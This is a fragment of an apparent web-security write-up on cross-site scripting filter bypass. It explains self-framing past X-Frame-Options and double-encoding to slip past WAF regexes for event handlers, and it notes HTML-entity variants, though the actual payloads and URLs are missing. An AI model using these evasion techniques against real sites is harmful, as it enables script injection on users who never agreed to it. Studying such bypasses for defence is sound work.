But it’s still easy to flag.
In a generic URL like this:
Where “host” is an IP address or domain, “page” is the vulnerable page and “p” is the vulnerable parameter.
This also respects “X-Frame-Options: SAMEORIGIN” HTTP security header, because it calls itself. Notice that we double encoded key points of the second vector, to avoid regex for event handlers based in “on” plus something and equal sign.
A live example is here (open it in Firefox).
See this cheat sheet for more vectors.
There’s also a variation using HTML entities, which although we are considering them being blocked by filter/WAF, can be used in a slightly different way: